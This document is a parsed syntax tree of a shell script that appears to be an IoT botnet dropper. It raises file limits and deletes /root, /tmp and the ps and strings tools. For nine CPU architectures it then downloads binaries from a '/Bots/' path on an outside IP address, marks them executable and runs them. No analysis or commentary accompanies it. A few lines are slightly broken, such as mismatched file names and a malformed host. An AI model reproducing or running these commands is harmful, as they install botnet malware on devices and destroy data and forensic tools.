CommandNode(lineno=2, pos=(12, 25), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 25), word='712'),
])
CommandNode(lineno=3, pos=(26, 47), parts=[
  WordNode(lineno=3, pos=(26, 33), word='busybox'),
  WordNode(lineno=3, pos=(34, 36), word='rm'),
  WordNode(lineno=3, pos=(37, 40), word='-rf'),
  WordNode(lineno=3, pos=(41, 47), word='/tmp/*'),
])
CommandNode(lineno=4, pos=(48, 70), parts=[
  WordNode(lineno=4, pos=(48, 55), word='busybox'),
  WordNode(lineno=4, pos=(56, 58), word='rm'),
  WordNode(lineno=4, pos=(59, 62), word='-rf'),
  WordNode(lineno=4, pos=(63, 70), word='/root/*'),
])
CommandNode(lineno=5, pos=(71, 102), parts=[
  WordNode(lineno=5, pos=(71, 78), word='busybox'),
  WordNode(lineno=5, pos=(79, 81), word='rm'),
  WordNode(lineno=5, pos=(82, 85), word='-rf'),
  WordNode(lineno=5, pos=(86, 102), word='/usr/bin/strings'),
])
CommandNode(lineno=6, pos=(103, 129), parts=[
  WordNode(lineno=6, pos=(103, 110), word='busybox'),
  WordNode(lineno=6, pos=(111, 113), word='rm'),
  WordNode(lineno=6, pos=(114, 117), word='-rf'),
  WordNode(lineno=6, pos=(118, 129), word='/usr/bin/ps'),
])
ListNode(lineno=7, pos=(130, 374), parts=[
  CommandNode(lineno=7, pos=(130, 137), parts=[
    WordNode(lineno=7, pos=(130, 132), word='cd'),
    WordNode(lineno=7, pos=(133, 137), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(138, 140)),
  CommandNode(lineno=7, pos=(141, 152), parts=[
    WordNode(lineno=7, pos=(141, 143), word='cd'),
    WordNode(lineno=7, pos=(144, 152), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(152, 153)),
  CommandNode(lineno=7, pos=(154, 162), parts=[
    WordNode(lineno=7, pos=(154, 156), word='rm'),
    WordNode(lineno=7, pos=(157, 160), word='-rf'),
    WordNode(lineno=7, pos=(161, 162), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(162, 163)),
  CommandNode(lineno=7, pos=(164, 201), parts=[
    WordNode(lineno=7, pos=(164, 168), word='wget'),
    WordNode(lineno=7, pos=(169, 201), word='http://212.237.24.47/Bots/snarm7'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(202, 204)),
  CommandNode(lineno=7, pos=(205, 250), parts=[
    WordNode(lineno=7, pos=(205, 212), word='busybox'),
    WordNode(lineno=7, pos=(213, 217), word='wget'),
    WordNode(lineno=7, pos=(218, 250), word='http://212.237.24.47/Bots/snarm7'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(251, 253)),
  CommandNode(lineno=7, pos=(254, 295), parts=[
    WordNode(lineno=7, pos=(254, 258), word='curl'),
    WordNode(lineno=7, pos=(259, 261), word='-O'),
    WordNode(lineno=7, pos=(262, 295), word='http://212.237.24.47/Bots/snarmv7'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(295, 296)),
  CommandNode(lineno=7, pos=(297, 346), parts=[
    WordNode(lineno=7, pos=(297, 304), word='busybox'),
    WordNode(lineno=7, pos=(305, 309), word='curl'),
    WordNode(lineno=7, pos=(310, 312), word='-O'),
    WordNode(lineno=7, pos=(313, 346), word='http://212.237.24.47/Bots/snarmv7'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(346, 347)),
  CommandNode(lineno=7, pos=(348, 364), parts=[
    WordNode(lineno=7, pos=(348, 353), word='chmod'),
    WordNode(lineno=7, pos=(354, 357), word='777'),
    WordNode(lineno=7, pos=(358, 364), word='snarm7'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(364, 365)),
  CommandNode(lineno=7, pos=(366, 374), parts=[
    WordNode(lineno=7, pos=(366, 374), word='./snarm7'),
  ]),
])
ListNode(lineno=8, pos=(375, 631), parts=[
  CommandNode(lineno=8, pos=(375, 382), parts=[
    WordNode(lineno=8, pos=(375, 377), word='cd'),
    WordNode(lineno=8, pos=(378, 382), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(383, 385)),
  CommandNode(lineno=8, pos=(386, 397), parts=[
    WordNode(lineno=8, pos=(386, 388), word='cd'),
    WordNode(lineno=8, pos=(389, 397), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(397, 398)),
  CommandNode(lineno=8, pos=(399, 407), parts=[
    WordNode(lineno=8, pos=(399, 401), word='rm'),
    WordNode(lineno=8, pos=(402, 405), word='-rf'),
    WordNode(lineno=8, pos=(406, 407), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(407, 408)),
  CommandNode(lineno=8, pos=(409, 448), parts=[
    WordNode(lineno=8, pos=(409, 413), word='wget'),
    WordNode(lineno=8, pos=(414, 448), word='http://212.237.24.47/Bots/snmipsel'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(449, 451)),
  CommandNode(lineno=8, pos=(452, 499), parts=[
    WordNode(lineno=8, pos=(452, 459), word='busybox'),
    WordNode(lineno=8, pos=(460, 464), word='wget'),
    WordNode(lineno=8, pos=(465, 499), word='http://212.237.24.47/Bots/snmipsel'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(500, 502)),
  CommandNode(lineno=8, pos=(503, 545), parts=[
    WordNode(lineno=8, pos=(503, 507), word='curl'),
    WordNode(lineno=8, pos=(508, 510), word='-O'),
    WordNode(lineno=8, pos=(511, 545), word='http://212.237.24.47/Bots/snmipsel'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(546, 548)),
  CommandNode(lineno=8, pos=(549, 599), parts=[
    WordNode(lineno=8, pos=(549, 556), word='busybox'),
    WordNode(lineno=8, pos=(557, 561), word='curl'),
    WordNode(lineno=8, pos=(562, 564), word='-O'),
    WordNode(lineno=8, pos=(565, 599), word='http://212.237.24.47/Bots/snmipsel'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(599, 600)),
  CommandNode(lineno=8, pos=(601, 619), parts=[
    WordNode(lineno=8, pos=(601, 606), word='chmod'),
    WordNode(lineno=8, pos=(607, 610), word='777'),
    WordNode(lineno=8, pos=(611, 619), word='snmipsel'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(619, 620)),
  CommandNode(lineno=8, pos=(621, 631), parts=[
    WordNode(lineno=8, pos=(621, 631), word='./snmipsel'),
  ]),
])
ListNode(lineno=9, pos=(632, 876), parts=[
  CommandNode(lineno=9, pos=(632, 639), parts=[
    WordNode(lineno=9, pos=(632, 634), word='cd'),
    WordNode(lineno=9, pos=(635, 639), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(640, 642)),
  CommandNode(lineno=9, pos=(643, 654), parts=[
    WordNode(lineno=9, pos=(643, 645), word='cd'),
    WordNode(lineno=9, pos=(646, 654), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(654, 655)),
  CommandNode(lineno=9, pos=(656, 664), parts=[
    WordNode(lineno=9, pos=(656, 658), word='rm'),
    WordNode(lineno=9, pos=(659, 662), word='-rf'),
    WordNode(lineno=9, pos=(663, 664), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(664, 665)),
  CommandNode(lineno=9, pos=(666, 703), parts=[
    WordNode(lineno=9, pos=(666, 670), word='wget'),
    WordNode(lineno=9, pos=(671, 703), word='http://212.237.24.47/Bots/snmips'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(704, 706)),
  CommandNode(lineno=9, pos=(707, 752), parts=[
    WordNode(lineno=9, pos=(707, 714), word='busybox'),
    WordNode(lineno=9, pos=(715, 719), word='wget'),
    WordNode(lineno=9, pos=(720, 752), word='http://212.237.24.47/Bots/snmips'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(753, 755)),
  CommandNode(lineno=9, pos=(756, 796), parts=[
    WordNode(lineno=9, pos=(756, 760), word='curl'),
    WordNode(lineno=9, pos=(761, 763), word='-O'),
    WordNode(lineno=9, pos=(764, 796), word='http://212.237.24.47/Bots/snmips'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(797, 799)),
  CommandNode(lineno=9, pos=(800, 848), parts=[
    WordNode(lineno=9, pos=(800, 807), word='busybox'),
    WordNode(lineno=9, pos=(808, 812), word='curl'),
    WordNode(lineno=9, pos=(813, 815), word='-O'),
    WordNode(lineno=9, pos=(816, 848), word='http://212.237.24.47/Bots/snmips'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(848, 849)),
  CommandNode(lineno=9, pos=(850, 866), parts=[
    WordNode(lineno=9, pos=(850, 855), word='chmod'),
    WordNode(lineno=9, pos=(856, 859), word='777'),
    WordNode(lineno=9, pos=(860, 866), word='snmips'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(866, 867)),
  CommandNode(lineno=9, pos=(868, 876), parts=[
    WordNode(lineno=9, pos=(868, 876), word='./snmips'),
  ]),
])
ListNode(lineno=10, pos=(877, 1134), parts=[
  CommandNode(lineno=10, pos=(877, 884), parts=[
    WordNode(lineno=10, pos=(877, 879), word='cd'),
    WordNode(lineno=10, pos=(880, 884), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(885, 887)),
  CommandNode(lineno=10, pos=(888, 899), parts=[
    WordNode(lineno=10, pos=(888, 890), word='cd'),
    WordNode(lineno=10, pos=(891, 899), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(899, 900)),
  CommandNode(lineno=10, pos=(901, 909), parts=[
    WordNode(lineno=10, pos=(901, 903), word='rm'),
    WordNode(lineno=10, pos=(904, 907), word='-rf'),
    WordNode(lineno=10, pos=(908, 909), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(909, 910)),
  CommandNode(lineno=10, pos=(911, 950), parts=[
    WordNode(lineno=10, pos=(911, 915), word='wget'),
    WordNode(lineno=10, pos=(916, 950), word='http://212.237.24.47/Bots/snmips64'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(951, 953)),
  CommandNode(lineno=10, pos=(954, 1002), parts=[
    WordNode(lineno=10, pos=(954, 961), word='busybox'),
    WordNode(lineno=10, pos=(962, 966), word='wget'),
    WordNode(lineno=10, pos=(967, 1002), word='http://212.237.24.47p/Bots/snmips64'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1003, 1005)),
  CommandNode(lineno=10, pos=(1006, 1048), parts=[
    WordNode(lineno=10, pos=(1006, 1010), word='curl'),
    WordNode(lineno=10, pos=(1011, 1013), word='-O'),
    WordNode(lineno=10, pos=(1014, 1048), word='http://212.237.24.47/Bots/snmips64'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1049, 1051)),
  CommandNode(lineno=10, pos=(1052, 1102), parts=[
    WordNode(lineno=10, pos=(1052, 1059), word='busybox'),
    WordNode(lineno=10, pos=(1060, 1064), word='curl'),
    WordNode(lineno=10, pos=(1065, 1067), word='-O'),
    WordNode(lineno=10, pos=(1068, 1102), word='http://212.237.24.47/Bots/snmips64'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1102, 1103)),
  CommandNode(lineno=10, pos=(1104, 1122), parts=[
    WordNode(lineno=10, pos=(1104, 1109), word='chmod'),
    WordNode(lineno=10, pos=(1110, 1113), word='777'),
    WordNode(lineno=10, pos=(1114, 1122), word='snmips64'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1122, 1123)),
  CommandNode(lineno=10, pos=(1124, 1134), parts=[
    WordNode(lineno=10, pos=(1124, 1134), word='./snmips64'),
  ]),
])
ListNode(lineno=11, pos=(1135, 1379), parts=[
  CommandNode(lineno=11, pos=(1135, 1142), parts=[
    WordNode(lineno=11, pos=(1135, 1137), word='cd'),
    WordNode(lineno=11, pos=(1138, 1142), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1143, 1145)),
  CommandNode(lineno=11, pos=(1146, 1157), parts=[
    WordNode(lineno=11, pos=(1146, 1148), word='cd'),
    WordNode(lineno=11, pos=(1149, 1157), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1157, 1158)),
  CommandNode(lineno=11, pos=(1159, 1167), parts=[
    WordNode(lineno=11, pos=(1159, 1161), word='rm'),
    WordNode(lineno=11, pos=(1162, 1165), word='-rf'),
    WordNode(lineno=11, pos=(1166, 1167), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1167, 1168)),
  CommandNode(lineno=11, pos=(1169, 1206), parts=[
    WordNode(lineno=11, pos=(1169, 1173), word='wget'),
    WordNode(lineno=11, pos=(1174, 1206), word='http://212.237.24.47/Bots/sni686'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1207, 1209)),
  CommandNode(lineno=11, pos=(1210, 1255), parts=[
    WordNode(lineno=11, pos=(1210, 1217), word='busybox'),
    WordNode(lineno=11, pos=(1218, 1222), word='wget'),
    WordNode(lineno=11, pos=(1223, 1255), word='http://212.237.24.47/Bots/sni686'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1256, 1258)),
  CommandNode(lineno=11, pos=(1259, 1299), parts=[
    WordNode(lineno=11, pos=(1259, 1263), word='curl'),
    WordNode(lineno=11, pos=(1264, 1266), word='-O'),
    WordNode(lineno=11, pos=(1267, 1299), word='http://212.237.24.47/Bots/sni686'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1300, 1302)),
  CommandNode(lineno=11, pos=(1303, 1351), parts=[
    WordNode(lineno=11, pos=(1303, 1310), word='busybox'),
    WordNode(lineno=11, pos=(1311, 1315), word='curl'),
    WordNode(lineno=11, pos=(1316, 1318), word='-O'),
    WordNode(lineno=11, pos=(1319, 1351), word='http://212.237.24.47/Bots/sni686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1351, 1352)),
  CommandNode(lineno=11, pos=(1353, 1369), parts=[
    WordNode(lineno=11, pos=(1353, 1358), word='chmod'),
    WordNode(lineno=11, pos=(1359, 1362), word='777'),
    WordNode(lineno=11, pos=(1363, 1369), word='sni686'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1369, 1370)),
  CommandNode(lineno=11, pos=(1371, 1379), parts=[
    WordNode(lineno=11, pos=(1371, 1379), word='./sni686'),
  ]),
])
ListNode(lineno=12, pos=(1380, 1630), parts=[
  CommandNode(lineno=12, pos=(1380, 1387), parts=[
    WordNode(lineno=12, pos=(1380, 1382), word='cd'),
    WordNode(lineno=12, pos=(1383, 1387), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1388, 1390)),
  CommandNode(lineno=12, pos=(1391, 1402), parts=[
    WordNode(lineno=12, pos=(1391, 1393), word='cd'),
    WordNode(lineno=12, pos=(1394, 1402), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1402, 1403)),
  CommandNode(lineno=12, pos=(1404, 1412), parts=[
    WordNode(lineno=12, pos=(1404, 1406), word='rm'),
    WordNode(lineno=12, pos=(1407, 1410), word='-rf'),
    WordNode(lineno=12, pos=(1411, 1412), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1412, 1413)),
  CommandNode(lineno=12, pos=(1414, 1452), parts=[
    WordNode(lineno=12, pos=(1414, 1418), word='wget'),
    WordNode(lineno=12, pos=(1419, 1452), word='http://212.237.24.47/Bots/snsparc'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1453, 1455)),
  CommandNode(lineno=12, pos=(1456, 1502), parts=[
    WordNode(lineno=12, pos=(1456, 1463), word='busybox'),
    WordNode(lineno=12, pos=(1464, 1468), word='wget'),
    WordNode(lineno=12, pos=(1469, 1502), word='http://212.237.24.47/Bots/snsparc'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1503, 1505)),
  CommandNode(lineno=12, pos=(1506, 1547), parts=[
    WordNode(lineno=12, pos=(1506, 1510), word='curl'),
    WordNode(lineno=12, pos=(1511, 1513), word='-O'),
    WordNode(lineno=12, pos=(1514, 1547), word='http://212.237.24.47/Bots/snsparc'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1548, 1550)),
  CommandNode(lineno=12, pos=(1551, 1600), parts=[
    WordNode(lineno=12, pos=(1551, 1558), word='busybox'),
    WordNode(lineno=12, pos=(1559, 1563), word='curl'),
    WordNode(lineno=12, pos=(1564, 1566), word='-O'),
    WordNode(lineno=12, pos=(1567, 1600), word='http://212.237.24.47/Bots/snsparc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1600, 1601)),
  CommandNode(lineno=12, pos=(1602, 1619), parts=[
    WordNode(lineno=12, pos=(1602, 1607), word='chmod'),
    WordNode(lineno=12, pos=(1608, 1611), word='777'),
    WordNode(lineno=12, pos=(1612, 1619), word='snsparc'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1619, 1620)),
  CommandNode(lineno=12, pos=(1621, 1630), parts=[
    WordNode(lineno=12, pos=(1621, 1630), word='./snsparc'),
  ]),
])
ListNode(lineno=13, pos=(1631, 1869), parts=[
  CommandNode(lineno=13, pos=(1631, 1638), parts=[
    WordNode(lineno=13, pos=(1631, 1633), word='cd'),
    WordNode(lineno=13, pos=(1634, 1638), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1639, 1641)),
  CommandNode(lineno=13, pos=(1642, 1653), parts=[
    WordNode(lineno=13, pos=(1642, 1644), word='cd'),
    WordNode(lineno=13, pos=(1645, 1653), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1653, 1654)),
  CommandNode(lineno=13, pos=(1655, 1663), parts=[
    WordNode(lineno=13, pos=(1655, 1657), word='rm'),
    WordNode(lineno=13, pos=(1658, 1661), word='-rf'),
    WordNode(lineno=13, pos=(1662, 1663), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1663, 1664)),
  CommandNode(lineno=13, pos=(1665, 1701), parts=[
    WordNode(lineno=13, pos=(1665, 1669), word='wget'),
    WordNode(lineno=13, pos=(1670, 1701), word='http://212.237.24.47/Bots/snsh4'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1702, 1704)),
  CommandNode(lineno=13, pos=(1705, 1749), parts=[
    WordNode(lineno=13, pos=(1705, 1712), word='busybox'),
    WordNode(lineno=13, pos=(1713, 1717), word='wget'),
    WordNode(lineno=13, pos=(1718, 1749), word='http://212.237.24.47/Bots/snsh4'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1750, 1752)),
  CommandNode(lineno=13, pos=(1753, 1792), parts=[
    WordNode(lineno=13, pos=(1753, 1757), word='curl'),
    WordNode(lineno=13, pos=(1758, 1760), word='-O'),
    WordNode(lineno=13, pos=(1761, 1792), word='http://212.237.24.47/Bots/snsh4'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1793, 1795)),
  CommandNode(lineno=13, pos=(1796, 1843), parts=[
    WordNode(lineno=13, pos=(1796, 1803), word='busybox'),
    WordNode(lineno=13, pos=(1804, 1808), word='curl'),
    WordNode(lineno=13, pos=(1809, 1811), word='-O'),
    WordNode(lineno=13, pos=(1812, 1843), word='http://212.237.24.47/Bots/snsh4'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1843, 1844)),
  CommandNode(lineno=13, pos=(1845, 1860), parts=[
    WordNode(lineno=13, pos=(1845, 1850), word='chmod'),
    WordNode(lineno=13, pos=(1851, 1854), word='777'),
    WordNode(lineno=13, pos=(1855, 1860), word='snsh4'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1860, 1861)),
  CommandNode(lineno=13, pos=(1862, 1869), parts=[
    WordNode(lineno=13, pos=(1862, 1869), word='./snsh4'),
  ]),
])
ListNode(lineno=14, pos=(1870, 2108), parts=[
  CommandNode(lineno=14, pos=(1870, 1877), parts=[
    WordNode(lineno=14, pos=(1870, 1872), word='cd'),
    WordNode(lineno=14, pos=(1873, 1877), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1878, 1880)),
  CommandNode(lineno=14, pos=(1881, 1892), parts=[
    WordNode(lineno=14, pos=(1881, 1883), word='cd'),
    WordNode(lineno=14, pos=(1884, 1892), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1892, 1893)),
  CommandNode(lineno=14, pos=(1894, 1902), parts=[
    WordNode(lineno=14, pos=(1894, 1896), word='rm'),
    WordNode(lineno=14, pos=(1897, 1900), word='-rf'),
    WordNode(lineno=14, pos=(1901, 1902), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1902, 1903)),
  CommandNode(lineno=14, pos=(1904, 1940), parts=[
    WordNode(lineno=14, pos=(1904, 1908), word='wget'),
    WordNode(lineno=14, pos=(1909, 1940), word='http://212.237.24.47/Bots/snx64'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1941, 1943)),
  CommandNode(lineno=14, pos=(1944, 1988), parts=[
    WordNode(lineno=14, pos=(1944, 1951), word='busybox'),
    WordNode(lineno=14, pos=(1952, 1956), word='wget'),
    WordNode(lineno=14, pos=(1957, 1988), word='http://212.237.24.47/Bots/snx64'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1989, 1991)),
  CommandNode(lineno=14, pos=(1992, 2031), parts=[
    WordNode(lineno=14, pos=(1992, 1996), word='curl'),
    WordNode(lineno=14, pos=(1997, 1999), word='-O'),
    WordNode(lineno=14, pos=(2000, 2031), word='http://212.237.24.47/Bots/snx64'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2032, 2034)),
  CommandNode(lineno=14, pos=(2035, 2082), parts=[
    WordNode(lineno=14, pos=(2035, 2042), word='busybox'),
    WordNode(lineno=14, pos=(2043, 2047), word='curl'),
    WordNode(lineno=14, pos=(2048, 2050), word='-O'),
    WordNode(lineno=14, pos=(2051, 2082), word='http://212.237.24.47/Bots/snx64'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2082, 2083)),
  CommandNode(lineno=14, pos=(2084, 2099), parts=[
    WordNode(lineno=14, pos=(2084, 2089), word='chmod'),
    WordNode(lineno=14, pos=(2090, 2093), word='777'),
    WordNode(lineno=14, pos=(2094, 2099), word='snx64'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2099, 2100)),
  CommandNode(lineno=14, pos=(2101, 2108), parts=[
    WordNode(lineno=14, pos=(2101, 2108), word='./snx64'),
  ]),
])
ListNode(lineno=15, pos=(2109, 2342), parts=[
  CommandNode(lineno=15, pos=(2109, 2116), parts=[
    WordNode(lineno=15, pos=(2109, 2111), word='cd'),
    WordNode(lineno=15, pos=(2112, 2116), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2117, 2119)),
  CommandNode(lineno=15, pos=(2120, 2131), parts=[
    WordNode(lineno=15, pos=(2120, 2122), word='cd'),
    WordNode(lineno=15, pos=(2123, 2131), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2131, 2132)),
  CommandNode(lineno=15, pos=(2133, 2141), parts=[
    WordNode(lineno=15, pos=(2133, 2135), word='rm'),
    WordNode(lineno=15, pos=(2136, 2139), word='-rf'),
    WordNode(lineno=15, pos=(2140, 2141), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2141, 2142)),
  CommandNode(lineno=15, pos=(2143, 2179), parts=[
    WordNode(lineno=15, pos=(2143, 2147), word='wget'),
    WordNode(lineno=15, pos=(2148, 2179), word='http://212.237.24.47/Bots/snppc'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2180, 2182)),
  CommandNode(lineno=15, pos=(2183, 2222), parts=[
    WordNode(lineno=15, pos=(2183, 2190), word='busybox'),
    WordNode(lineno=15, pos=(2191, 2222), word='http://212.237.24.47/Bots/snppc'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2223, 2225)),
  CommandNode(lineno=15, pos=(2226, 2265), parts=[
    WordNode(lineno=15, pos=(2226, 2230), word='curl'),
    WordNode(lineno=15, pos=(2231, 2233), word='-O'),
    WordNode(lineno=15, pos=(2234, 2265), word='http://212.237.24.47/Bots/snppc'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(2266, 2268)),
  CommandNode(lineno=15, pos=(2269, 2316), parts=[
    WordNode(lineno=15, pos=(2269, 2276), word='busybox'),
    WordNode(lineno=15, pos=(2277, 2281), word='curl'),
    WordNode(lineno=15, pos=(2282, 2284), word='-O'),
    WordNode(lineno=15, pos=(2285, 2316), word='http://212.237.24.47/Bots/snppc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2316, 2317)),
  CommandNode(lineno=15, pos=(2318, 2333), parts=[
    WordNode(lineno=15, pos=(2318, 2323), word='chmod'),
    WordNode(lineno=15, pos=(2324, 2327), word='777'),
    WordNode(lineno=15, pos=(2328, 2333), word='snppc'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2333, 2334)),
  CommandNode(lineno=15, pos=(2335, 2342), parts=[
    WordNode(lineno=15, pos=(2335, 2342), word='./snppc'),
  ]),
])
CommandNode(lineno=16, pos=(2343, 2356), parts=[
  WordNode(lineno=16, pos=(2343, 2345), word='rm'),
  WordNode(lineno=16, pos=(2346, 2349), word='-rf'),
  WordNode(lineno=16, pos=(2350, 2356), word='/tmp/*'),
])
